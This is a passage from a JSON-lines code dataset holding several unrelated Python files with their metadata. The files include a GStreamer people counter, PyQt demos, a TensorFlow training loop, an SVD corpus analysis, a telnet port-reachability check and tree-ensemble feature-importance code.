The action could not be done!\")\n\n\nif __name__ == \"__main__\":\n args = sys.argv[1:]\n if len(args) == 0:\n project_name = input('Choose a name for the project:\\n The name should be lower cased alphanumerical value (underscore include) \\n with length ranging from 3 to 20.\\n:')\n else:\n project_name = args[0]\n rename_project(project_name)\n\n \n", "sub_path": "rename.py", "file_name": "rename.py", "file_ext": "py", "file_size_in_byte": 2022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 8, "usage_type": "call"}, {"api_name": "fileinput.FileInput", "line_number": 15, "usage_type": "call"}, {"api_name": "re.match", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 23, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "524852495", "text": "import setuptools\n\n# A bit of pbr monkey-patching\n# We'd like to have a way to compose extras.\nimport pbr.util\norig_setup_cfg_to_setup_kwargs = pbr.util.setup_cfg_to_setup_kwargs\n\ndef lookup_extras(requirement, extras):\n if not requirement.startswith('['):\n return [requirement]\n extra = requirement.strip('[]')\n requirements = []\n for requirement in extras[extra]:\n requirements += lookup_extras(requirement, extras)\n return requirements\n\ndef setup_cfg_to_setup_kwargs(*args, **kwargs):\n kwargs = orig_setup_cfg_to_setup_kwargs(*args, **kwargs)\n extras = kwargs['extras_require']\n for extra, requirements in extras.items():\n new_requirements = []\n for requirement in requirements:\n new_requirements += lookup_extras(requirement, extras)\n extras[extra] = new_requirements\n return kwargs\n\npbr.util.setup_cfg_to_setup_kwargs = setup_cfg_to_setup_kwargs\n\n\nsetuptools.setup(\n setup_requires=['pbr'],\n pbr=True,\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 988, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pbr.util.util", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pbr.util", "line_number": 6, "usage_type": "name"}, {"api_name": "pbr.util.util", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pbr.util", "line_number": 27, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "444219492", "text": "import gi\n\ngi.require_version(\"GstBase\", \"1.0\")\n\nimport os\nimport cv2\nimport numpy as np\nimport msgpack\nimport struct\nfrom gi.repository import Gst, GObject, GstBase, GLib\nfrom typing import List\n\nGst.init(None)\n\nICAPS = Gst.Caps(\n Gst.Structure(\n \"application/msgpack-predicts\"\n )\n)\n\nOCAPS = Gst.Caps(\n Gst.Structure(\n \"application/meter\",\n )\n)\n\n\ndef read_mask():\n mask = cv2.imread(os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"..\",\n 
\"resource\",\n \"mask.bmp\",\n ))\n return mask\n\n\nclass PeopleCounter(GstBase.BaseTransform):\n __gstmetadata__ = (\"PeopleCounter\", \"Transform\", \"Counter\", \"UM\")\n\n __gsttemplates__ = (\n Gst.PadTemplate.new(\n \"src\", Gst.PadDirection.SRC, Gst.PadPresence.ALWAYS, OCAPS\n ),\n Gst.PadTemplate.new(\n \"sink\", Gst.PadDirection.SINK, Gst.PadPresence.ALWAYS, ICAPS\n ),\n )\n\n max_age = GObject.Property(\n type=int,\n nick=\"Max Age\",\n blurb=\"Amount of frames, infuencing on current count.\",\n minimum=0,\n maximum=100,\n default=1,\n flags=GObject.ParamFlags.READWRITE,\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.buffer: List[int] = []\n\n self.last_tracks: List[int] = []\n self.last_coords: List[List[float]] = []\n self.last_mean_count: int = None\n self.room_people_counter: int = 0\n self.original_mask = read_mask()\n self._mask = None\n\n def get_mask(self, shape):\n shape = tuple(shape)\n if self._mask is not None and self._mask.shape == shape:\n return self._mask\n mask = cv2.resize(self.original_mask, shape)\n self._mask = np.clip(mask[:, :, 2], 0, 1)\n return self._mask\n\n def do_transform_caps(self, direction, caps, filter_):\n # (Kostya): without this override the element negotiates\n # the same formats on both caps, which is not what we need here:\n # our `src` cap must return predicts instead of a video stream.\n #\n # Copied from: https://github.com/GStreamer/gst-python/blob/30cc0fc83de306626bfb30b679156be30fbf1be9/examples/plugins/python/audioplot.py#L164\n\n if direction == Gst.PadDirection.SRC:\n res = ICAPS\n else:\n res = OCAPS\n\n if filter_:\n res = res.intersect(filter_)\n return res\n\n def do_transform(self, inbuf, outbuf):\n magic_header = 0xfa91ffff\n\n is_success, info = inbuf.map(Gst.MapFlags.READ)\n assert is_success is True\n\n s = '!LL'\n magic, payload_length, = struct.unpack_from(s, info.data)\n struct_size = struct.calcsize(s)\n assert magic == magic_header, f\"unexpected payload! 
{magic:x}\"\n shape, _labels, _scores, _coords, _tracks = msgpack.unpackb(\n info.data[struct_size: payload_length + struct_size],\n raw=False\n )\n\n inbuf.unmap(info)\n\n self.buffer.append(len(_labels))\n self.buffer = self.buffer[-self.max_age:]\n\n mean_count = int(sum(self.buffer)/len(self.buffer))\n\n mask = self.get_mask(shape)\n\n # check new tracks\n appeared = 0\n left = 0\n\n for idx, track in enumerate(_tracks):\n if track not in self.last_tracks:\n coords = _coords[idx]\n center_x = int((coords[0] + coords[2]) / 2)\n center_y = int((coords[1] + coords[3]) / 2)\n if mask[center_y, center_x]:\n appeared += 1\n\n for idx, track in enumerate(self.last_tracks):\n if track not in _tracks:\n coords = self.last_coords[idx]\n center_x = int((coords[0] + coords[2]) / 2)\n center_y = int((coords[1] + coords[3]) / 2)\n if mask[center_y, center_x]:\n left += 1\n\n self.last_tracks = _tracks\n self.last_coords = _coords\n\n room_count = 0xffffffff\n if self.last_mean_count is not None:\n delta = self.last_mean_count - mean_count\n self.room_people_counter += delta - left + appeared\n self.room_people_counter = max(0, self.room_people_counter) # prevent subzero counts\n room_count = self.room_people_counter\n\n self.last_mean_count = mean_count\n\n meter_magic_header = 0xfa91f534\n full_data = struct.pack('!LLL', meter_magic_header, mean_count, room_count)\n\n assert len(full_data) <= outbuf.get_size(), (\n f\"Too much data {len(full_data)} for buffer {outbuf.get_size()}\"\n )\n\n outbuf.fill(0, full_data)\n\n return Gst.FlowReturn.OK\n\n\nGObject.type_register(PeopleCounter)\n__gstelementfactory__ = (\"people_counter_py\", Gst.Rank.NONE, PeopleCounter)\n", "sub_path": "detector_back/worker/detector/gstreamer/python/people_counter.py", "file_name": "people_counter.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "gi.require_version", "line_number": 3, "usage_type": "call"}, {"api_name": "gi.repository.Gst.init", "line_number": 13, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 13, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Caps", "line_number": 15, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 15, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Structure", "line_number": 16, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 16, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Caps", "line_number": 21, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 21, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Structure", "line_number": 22, "usage_type": "call"}, {"api_name": "gi.repository.Gst", "line_number": 22, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 30, "usage_type": "call"}, {"api_name": "gi.repository.GstBase.BaseTransform", "line_number": 38, "usage_type": "attribute"}, {"api_name": "gi.repository.GstBase", "line_number": 38, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadTemplate.new", "line_number": 42, "usage_type": "call"}, {"api_name": 
"gi.repository.Gst.PadTemplate", "line_number": 42, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 42, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadDirection", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadPresence", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst.PadTemplate.new", "line_number": 45, "usage_type": "call"}, {"api_name": "gi.repository.Gst.PadTemplate", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 45, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadDirection", "line_number": 46, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 46, "usage_type": "name"}, {"api_name": "gi.repository.Gst.PadPresence", "line_number": 46, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.Property", "line_number": 50, "usage_type": "call"}, {"api_name": "gi.repository.GObject", "line_number": 50, "usage_type": "name"}, {"api_name": "gi.repository.GObject.ParamFlags", "line_number": 57, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 65, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 76, "usage_type": "call"}, {"api_name": "gi.repository.Gst.PadDirection", "line_number": 86, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 86, "usage_type": "name"}, {"api_name": "gi.repository.Gst.MapFlags", "line_number": 98, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 98, "usage_type": "name"}, {"api_name": "struct.unpack_from", "line_number": 102, "usage_type": "call"}, {"api_name": "struct.calcsize", "line_number": 103, "usage_type": "call"}, {"api_name": "msgpack.unpackb", "line_number": 105, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 152, "usage_type": "call"}, {"api_name": "gi.repository.Gst.FlowReturn", "line_number": 160, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 160, "usage_type": "name"}, {"api_name": "gi.repository.GObject.type_register", "line_number": 163, "usage_type": "call"}, {"api_name": "gi.repository.GObject", "line_number": 163, "usage_type": "name"}, {"api_name": "gi.repository.Gst.Rank", "line_number": 164, "usage_type": "attribute"}, {"api_name": "gi.repository.Gst", "line_number": 164, "usage_type": "name"}]} +{"seq_id": "513124511", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 22 10:59:07 2018\n\n@author: 354651\n\"\"\"\n\nimport tensorflow as tf\nfrom model import model\nimport dataset\n\n\ndef main():\n with tf.Session() as sess:\n \n m = model(sess)\n \n sess.run(tf.global_variables_initializer())\n \n for epoch in range(10):\n total_cost = 0\n \n for step in range(dataset.total_batch):\n x_data, y_data = dataset.train_data()\n c, _ = m.train(x_data, y_data)\n total_cost += c\n \n print(\"{} cost: {}\".format(epoch + 1, total_cost / dataset.total_batch))\n \n x_data, y_data = dataset.test_data()\n print(\"accuracy: {}\".format(m.accuracy(x_data, y_data)))\n \n \nif __name__ == '__main__':\n main()", "sub_path": "CNN/CNN.py", "file_name": "CNN.py", 
"file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tensorflow.Session", "line_number": 14, "usage_type": "call"}, {"api_name": "model.model", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 18, "usage_type": "call"}, {"api_name": "dataset.total_batch", "line_number": 23, "usage_type": "attribute"}, {"api_name": "dataset.train_data", "line_number": 24, "usage_type": "call"}, {"api_name": "dataset.total_batch", "line_number": 28, "usage_type": "attribute"}, {"api_name": "dataset.test_data", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "235708320", "text": "import sys\nfrom PyQt5.QtWidgets import QTableWidget, QApplication, QMainWindow\nfrom PyQt5.QtWidgets import QTableWidgetItem\n\n'''\nLesson 17 (2/4)\nQTableWidget\nSpreadsheet Project\n'''\n\nclass MyTable(QTableWidget):\n\n def __init__(self, rows, columns):\n super(MyTable, self).__init__(rows, columns)\n\n self.init_ui()\n\n def init_ui(self):\n self.cellChanged.connect(self.c_current)\n\n self.show()\n\n def c_current(self):\n row = self.currentRow() # current row of the table instance\n col = self.currentColumn()\n value = self.item(row, col)\n value = value.text()\n print('The current cell is ', row, ', ', col)\n print('In this cell we have: ', value)\n\nclass Sheet(QMainWindow):\n #form_widget = MyTable(10, 10)\n\n def __init__(self):\n super(Sheet, self).__init__()\n\n form_widget = MyTable(10,10) # used self in the original tuts\n\n self.setCentralWidget(form_widget)\n col_headers = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']\n form_widget.setHorizontalHeaderLabels(col_headers)\n\n number = QTableWidgetItem('10') # special item for QTableWidget\n form_widget.setCurrentCell(1, 1)\n # if this line form_widget.setCurrentCell(1, 1) is not specified\n # no value will be passed to c_current\n\n form_widget.setItem(1, 1, number)\n # because val in this cell is changed, it calls c_current\n\n self.show()\n\n\napp = QApplication([])\nsheet = Sheet()\nsys.exit(app.exec_())", "sub_path": "lesson17_tablep2.py", "file_name": "lesson17_tablep2.py", "file_ext": "py", "file_size_in_byte": 1534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "147855923", "text": "# coding:utf-8\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\n\nfrom dialog import Dialog\n\n\nclass Window(QWidget):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.resize(1000, 500)\n self.btn = QPushButton('点我', parent=self)\n self.btn.move(425, 225)\n self.btn.clicked.connect(self.showDialog)\n with open('resource/demo.qss', encoding='utf-8') as f:\n self.setStyleSheet(f.read())\n\n def showDialog(self):\n content = '如果将\"音乐\"文件夹从音乐中移除,则该文件夹不会再出现在音乐中,但不会被删除。'\n w = Dialog('删除此文件夹吗?', content, self)\n w.exec()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = Window()\n w.show()\n sys.exit(app.exec_())\n", "sub_path": 
"widgets/dialog/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 13, "usage_type": "call"}, {"api_name": "dialog.Dialog", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "15455134", "text": "\"\"\"\nResearch questions:\n1. Are singular values higher for first or second half of input?\n2. Are those dimensions with higher singular values NOUN-encoding dimensions?\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom scipy.sparse import linalg as slinalg\nfrom sklearn.preprocessing import normalize\nimport attr\nimport numpy as np\n\nfrom preppy import PartitionedPrep as TrainPrep\n\nfrom wordplay import config\nfrom wordplay.params import PrepParams\nfrom wordplay.docs import load_docs\nfrom wordplay.representation import make_context_by_term_matrix\nfrom wordplay.svd import decode_singular_dimensions\nfrom wordplay.pos import load_pos_words\nfrom wordplay import config\n\n# /////////////////////////////////////////////////////////////////\n\nCORPUS_NAME = 'childes-20180319'\n\ndocs = load_docs(CORPUS_NAME)\n\nparams = PrepParams(num_types=None)\nprep = TrainPrep(docs, **attr.asdict(params))\n\n# /////////////////////////////////////////////////////////////////\n\nCONTEXT_SIZE = 2\nNUM_DIMS = 32\nNORMALIZE = False # this makes all the difference - this means that the scales of variables are different and matter\n\n\nNOM_ALPHA = 0.01 # TODO test\n\nOFFSET = prep.midpoint\nLABELS = [f'first {OFFSET:,} tokens', f'last {OFFSET:,} tokens']\n\n# ///////////////////////////////////////////////////////////////////// categories\n\n# make syntactic categories for probing\ncat2words = {}\nfor cat in ['nouns', 'verbs']:\n category_words = load_pos_words(f'{CORPUS_NAME}-{cat}')\n cat2words[cat] = category_words\n print(f'Loaded {len(category_words)} words in category {cat}')\n assert len(category_words) > 0\n\n# /////////////////////////////////////////////////////////////////////////// SVD\n\n# make term_by_window_co_occurrence_mats\nstart1, end1 = 0, prep.midpoint\nstart2, end2 = prep.midpoint, prep.store.num_tokens\ntw_mat1, xws1, yws1 = make_context_by_term_matrix(\n prep.store.tokens, start=start1, end=end1, context_size=CONTEXT_SIZE)\ntw_mat2, xws2, yws2 = make_context_by_term_matrix(\n prep.store.tokens, start=start2, end=end2, context_size=CONTEXT_SIZE)\n\n\n# collect singular values\nlabel2cat2dim_ids = {}\nlabel2s = {}\nfor mat, label, x_words in zip([tw_mat1.T.asfptype(), tw_mat2.T.asfptype()],\n LABELS,\n [xws1, xws2]):\n\n if NORMALIZE:\n mat = normalize(mat, axis=1, norm='l2', copy=False)\n\n # SVD\n u, s, _ = slinalg.svds(mat, k=NUM_DIMS, return_singular_vectors=True)\n print('sum of singular values={:,}'.format(s.sum()))\n print('var of singular values={:,}'.format(s.var()))\n\n # collect singular values\n label2s[label] = s\n\n # let noun and verbs compete for dimensions to be sure that a dimension encodes nouns\n cat2dim_ids = decode_singular_dimensions(u, cat2words, x_words,\n num_dims=NUM_DIMS,\n nominal_alpha=NOM_ALPHA,\n plot_loadings=False)\n\n label2cat2dim_ids[label] = 
cat2dim_ids\n\n# get noun dims to label figure\nnoun_dims1 = label2cat2dim_ids[LABELS[0]]['nouns']\nnoun_dims2 = label2cat2dim_ids[LABELS[1]]['nouns']\ns1 = label2s[LABELS[0]]\ns2 = label2s[LABELS[1]]\ns1_noun_dims = [s1[i] if not np.isnan(i) else np.nan for i in noun_dims1]\ns2_noun_dims = [s2[i] if not np.isnan(i) else np.nan for i in noun_dims2]\n\n# figure\nfig, ax = plt.subplots(figsize=config.Fig.fig_size, dpi=config.Fig.dpi)\nplt.title(f'SVD of AO-CHILDES partitions\\nwindow size={CONTEXT_SIZE}', fontsize=config.Fig.ax_fontsize)\nax.set_ylabel('Singular value', fontsize=config.Fig.ax_fontsize)\nax.set_xlabel('Singular Dimension', fontsize=config.Fig.ax_fontsize)\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.tick_params(axis='both', which='both', top=False, right=False)\n# plot\nax.plot(s1[::-1], label=LABELS[0], linewidth=2, color='C0')\nax.plot(s2[::-1], label=LABELS[1], linewidth=2, color='C1')\n# label noun-dims\nx = np.arange(NUM_DIMS)\n\nax.scatter(x, s1_noun_dims[::-1], label='NOUN dimension', color='C0', zorder=3)\nax.scatter(x, s2_noun_dims[::-1], label='NOUN dimension', color='C1', zorder=3)\nax.legend(loc='upper right', frameon=False, fontsize=config.Fig.ax_fontsize)\nplt.tight_layout()\nplt.show()", "sub_path": "scripts/svd/singular_values.py", "file_name": "singular_values.py", "file_ext": "py", "file_size_in_byte": 4233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "wordplay.docs.load_docs", "line_number": 27, "usage_type": "call"}, {"api_name": "wordplay.params.PrepParams", "line_number": 29, "usage_type": "call"}, {"api_name": "preppy.PartitionedPrep", "line_number": 30, "usage_type": "call"}, {"api_name": "attr.asdict", "line_number": 30, "usage_type": "call"}, {"api_name": "wordplay.pos.load_pos_words", "line_number": 49, "usage_type": "call"}, {"api_name": "wordplay.representation.make_context_by_term_matrix", "line_number": 59, "usage_type": "call"}, {"api_name": "wordplay.representation.make_context_by_term_matrix", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 73, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.svds", "line_number": 76, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg", "line_number": 76, "usage_type": "name"}, {"api_name": "wordplay.svd.decode_singular_dimensions", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 100, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 101, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 101, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 102, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 102, 
"usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "wordplay.config.Fig", "line_number": 115, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "174629713", "text": "import telnetlib\nimport sys\nimport os\n\nfrom mstore.common import cfg\n\ncore_opts = [\n cfg.StrOpt('port', default='8989',\n help=('The mstore server listen port')),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(core_opts)\n\n\ndef telnet(host):\n status = ''\n msg = ''\n try:\n tn = telnetlib.Telnet(host, port=CONF.port, timeout=3)\n except Exception:\n status = 'inactive'\n msg = 'connected timeout'\n return status,msg\n \n tn.close()\n status = 'active'\n msg = 'connected ok'\n return status,msg\n", "sub_path": "mstore/common/telnet.py", "file_name": "telnet.py", "file_ext": "py", "file_size_in_byte": 549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "mstore.common.cfg.StrOpt", "line_number": 8, "usage_type": "call"}, {"api_name": "mstore.common.cfg", "line_number": 8, "usage_type": "name"}, {"api_name": "mstore.common.cfg.CONF", "line_number": 12, "usage_type": "attribute"}, {"api_name": "mstore.common.cfg", "line_number": 12, "usage_type": "name"}, {"api_name": "telnetlib.Telnet", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "287482537", "text": "import pytest\n\nimport os\nimport pandas as pd\nfrom dataland.dataset import IncrementalDataset\n\n@pytest.fixture\ndef dataset():\n return pd.DataFrame({'col_a': [1, 2, 3], 'col_b': [4, 5, 6]})\n\nclass TestIncrementalDataset(object):\n def test_creates_new_local_dataset(self):\n incremental = IncrementalDataset('tmp/sample_dataset')\n metadata = open('tmp/sample_dataset/.metadata')\n\n assert metadata.read() == '{\"first_drop\": null, \"drop_count\": 0, \"last_drop\": null, columns: []}'\n\n @pytest.mark.freeze_time('2018-04-20 16:20:00.012')\n def test_store_create_new_data_drop(self, dataset):\n incremental = IncrementalDataset('tmp/sample_dataset/')\n\n assert not os.path.isfile('tmp/sample_dataset/2018-04-20-1620.csv')\n incremental.store(dataset)\n\n assert os.path.isfile('tmp/sample_dataset/2018-04-20-1620.csv')\n", "sub_path": "tests/dataland/test_dataset.py", "file_name": "test_dataset.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 7, "usage_type": "attribute"}, {"api_name": "dataland.dataset.IncrementalDataset", "line_number": 13, "usage_type": "call"}, {"api_name": "dataland.dataset.IncrementalDataset", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pytest.mark.freeze_time", "line_number": 18, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "286646286", "text": "import functools\nimport operator\n\n\ndef tree_feature_importance(dataset, label_name, tree):\n    features_dict = {}\n    root = tree.get_root()\n    this_level = [(root, dataset)]\n    while this_level:\n        next_level = list()\n        for node, data in this_level:\n            if node.is_terminal():\n                continue\n            # Save for the next level\n            RL_data = data[data.iloc[:, node.j] <= node.s]\n            RR_data = data[data.iloc[:, node.j] > node.s]\n            next_level.append((node.left_descendant, RL_data))\n            next_level.append((node.right_descendant, RR_data))\n            # calculate the needed constants\n            c_bef = data[label_name].mean()  # mean response of the data reaching this node\n            c_L = RL_data[label_name].mean()\n            c_R = RR_data[label_name].mean()\n            if node.j not in features_dict.keys():\n                features_dict[node.j] = 0\n\n            features_dict[node.j] += \\\n                functools.reduce(operator.add, [(row[label_name] - c_bef) ** 2 for _, row in data.iterrows()]) + \\\n                functools.reduce(operator.add, [(row[label_name] - c_L) ** 2 for _, row in RL_data.iterrows()]) + \\\n                functools.reduce(operator.add, [(row[label_name] - c_R) ** 2 for _, row in RR_data.iterrows()])\n\n        this_level = next_level\n    return features_dict\n\n\ndef ensemble_feature_importance(dataset, label_name, tree_ensemble):\n    ensemble_features_dict = {}\n    for tree in tree_ensemble.trees:\n        tree_features_dict = tree_feature_importance(dataset, label_name, tree)\n        for feature_id, score in tree_features_dict.items():\n            if feature_id not in ensemble_features_dict.keys():\n                ensemble_features_dict[feature_id] = 0\n            ensemble_features_dict[feature_id] += score\n    ensemble_features_dict = sorted(ensemble_features_dict.items(), key=operator.itemgetter(1), reverse=True)\n    most_imp_val = ensemble_features_dict[0][1]  # sorted() returns (feature, score) pairs, highest score first\n    ensemble_features_dict = {k: float(v / most_imp_val) for k, v in ensemble_features_dict}\n    return ensemble_features_dict", "sub_path": "feature_selection.py", "file_name": "feature_selection.py", "file_ext": "py", "file_size_in_byte": 2073, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "functools.reduce", "line_number": 27, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 27, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 28, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 29, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 29, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "117125525", "text": "from fire_eye.fire_eye import FireEye\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nif __name__ == '__main__':\n\t# create an instance of a FireEye object\n\teye = FireEye()\n\n\t# scrape some new images\n\teye.scrape_more_data(num_images=2,\n\t\t\t\t\t\t pos_queries=['Forest Fire', 'wildfire'],\n\t\t\t\t\t\t neg_queries=['Forest', 'autumn forest'])\n\t\n\t# load any previously scraped images into the preprocessed dataset\n\teye.load_scraped_data(pos_queries=['Forest Fire', 'wildfire'],\n\t\t\t\t\t\t  neg_queries=['Forest', 'autumn forest'])\n\t# load kaggle dataset images into the preprocessed dataset\n\teye.load_kaggle_data()\n\t# print the dataset 
